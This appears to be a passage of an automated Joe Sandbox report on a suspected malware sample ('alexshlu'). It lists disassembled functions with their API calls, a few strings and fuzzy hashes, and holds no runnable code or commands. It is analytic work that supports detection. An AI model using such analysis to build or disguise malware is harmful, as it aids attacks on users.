                                                                                                                                                                                                                                        Function 00427307 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                                                                                                                                                                        • Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B
                                                                                                                                                                                                                                        Function 004292D0 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                                                                                                                                                                                        • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                                                                                                                                                                                                                        Function 00436B20 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                                                                                                                                                                        • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                                                                                                                                                                                                                        Function 0041597D Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                                                                                                                                                                        • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
                                                                                                                                                                                                                                        Function 004345F0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                        • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                                                                                                                                                                                                                        Function 0042A060 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                                                                                                                                                                        • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                                                                                                                                                                                                                        Function 00402B70 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                                                                                                                                                                        • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                                                                                                                                                                                                                        Function 0042B475 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                                                                                                                                                                        • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                                                                                                                                                                                                                        Function 0040C274 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                                                                                                                                                                        • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
                                                                                                                                                                                                                                        Function 002A1F20 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 118windowregistryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002A1F53
                                                                                                                                                                                                                                        • RegisterClassW.USER32(?), ref: 002A1F6A
                                                                                                                                                                                                                                        • CreateWindowExW.USER32 ref: 002A1FCA
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002A1FD4
                                                                                                                                                                                                                                        • GetMessageW.USER32(Christmas Balls,00000000,00000000,00000000), ref: 002A2000
                                                                                                                                                                                                                                        • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A203D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$ClassCreateErrorHandleLastModuleRegisterWindow
                                                                                                                                                                                                                                        • String ID: Christmas Balls$CreatingTool$Keep low...$[err id]: %i
                                                                                                                                                                                                                                        • API String ID: 91802587-478130180
                                                                                                                                                                                                                                        • Opcode ID: 40934d2cd047d991b8b04560213ce61a56fde0a06b3d4efd548752129299f1d5
                                                                                                                                                                                                                                        • Instruction ID: 9f8c2dbd68fbaabf85c78cdbeef895a99bf713e36508cb3ee2b7f210eec266fb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40934d2cd047d991b8b04560213ce61a56fde0a06b3d4efd548752129299f1d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91419070A28341DFD300DF24D849B2BB7E4BF9A704F00851DF9899B290DB70D954CB92
                                                                                                                                                                                                                                        Function 002A20D0 Relevance: 13.6, APIs: 9, Instructions: 109threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002A20E8
                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A20F9
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002A214A
                                                                                                                                                                                                                                          • Part of subcall function 002AD0B6: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 002AD0C2
                                                                                                                                                                                                                                          • Part of subcall function 002AD0B6: GetExitCodeThread.KERNEL32(?,?), ref: 002AD0DB
                                                                                                                                                                                                                                          • Part of subcall function 002AD0B6: CloseHandle.KERNEL32(?), ref: 002AD0ED
                                                                                                                                                                                                                                          • Part of subcall function 002B3E7D: CreateThread.KERNEL32(?,?,002B3F95,00000000,?,?), ref: 002B3EC6
                                                                                                                                                                                                                                          • Part of subcall function 002B3E7D: GetLastError.KERNEL32 ref: 002B3ED2
                                                                                                                                                                                                                                          • Part of subcall function 002B3E7D: __dosmaperr.LIBCMT ref: 002B3ED9
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002A21AF
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A21E9
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A21F0
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A21F7
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A2204
                                                                                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 002A2213
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFileLastNameObjectSingleWait__dosmaperr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 686914455-0
                                                                                                                                                                                                                                        • Opcode ID: 51abd89964b6c94acf0f23f89a1543b5fbfd720addfd54f72408664222c07117
                                                                                                                                                                                                                                        • Instruction ID: eea45fd2a52f8132e43a3e1b5d841638d6e9af652e8e0bbbf5f12d74b7488a77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51abd89964b6c94acf0f23f89a1543b5fbfd720addfd54f72408664222c07117
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1631B3B1A60301BBE720AF659C07B9A77A49F47B40F004419FA4D6A1C5EFB49974CFA3
                                                                                                                                                                                                                                        Function 002C9712 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 127012223-0
                                                                                                                                                                                                                                        • Opcode ID: 2a8f19a91fe03e87e8c303ee21eadb2dd9105b5ba38b9cd6a3ef71282da02cf2
                                                                                                                                                                                                                                        • Instruction ID: 45def58a13224a00156af302ea12e99d0ee4744cc8fbcf630a1fe10a7ecd045e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a8f19a91fe03e87e8c303ee21eadb2dd9105b5ba38b9cd6a3ef71282da02cf2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A71087293120A6FDF219F648C89FAFB7B9EF46310F15031DE908A7142DA759CA4CB51
                                                                                                                                                                                                                                        Function 002ADE85 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 002ADECC
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002ADEF8
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 002ADF37
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002ADF54
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002ADF93
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002ADFB0
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002ADFF2
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002AE015
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                        • Opcode ID: dd8c7a5f7c7da022ea86dbc23978c5a9739825358631e6f98b1d59cbd452701b
                                                                                                                                                                                                                                        • Instruction ID: 5953da72a4d21e45971c979b69eb9f96989744b40ee20e649fe5458d8ddd4ff8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd8c7a5f7c7da022ea86dbc23978c5a9739825358631e6f98b1d59cbd452701b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C451C07292020BAFEF208F60DC45FAB7BA9EF46780F154429F916E6150DFB4DD218B50
                                                                                                                                                                                                                                        Function 002BD7EB Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction ID: 180e5ac06706b3467487e35fd0a98064ccc48ad8d2c1cde99aaf044395474790
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17B16A32E247569FDB11CF28CC82BEE7BA5EF55390F144165E904AB282F374D961CBA0
                                                                                                                                                                                                                                        Function 002AEE00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEE37
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002AEE3F
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEEC8
                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002AEEF3
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEF48
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                        • Opcode ID: 3de6e295daf2a9b5d9d2e33ad6ce36f9acc2fc719d4e7bc9284b5da83eea8fb6
                                                                                                                                                                                                                                        • Instruction ID: 8b48c03b2c545f4d099e90daf337b5b9dfa60ae25d1cfec16a8da2d2292c58a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de6e295daf2a9b5d9d2e33ad6ce36f9acc2fc719d4e7bc9284b5da83eea8fb6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF41E830E20219AFCF10DF68C885A9EBBB5EF46324F158155E8149B352CB31DE22CF92
                                                                                                                                                                                                                                        Function 002ADD27 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002ADD3B
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000,00000000,00000000), ref: 002ADD5A
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADD88
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDE3
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDFA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 66001078-3882152299
                                                                                                                                                                                                                                        • Opcode ID: 48ad1aff258f7f7391fd6aa0a3c86b338e5d909e1896a33729a1a763741fcb22
                                                                                                                                                                                                                                        • Instruction ID: 573ea131474d8e7ae42b36d1736daa81c00a0a3ca906362a62bcebb0aba576d3
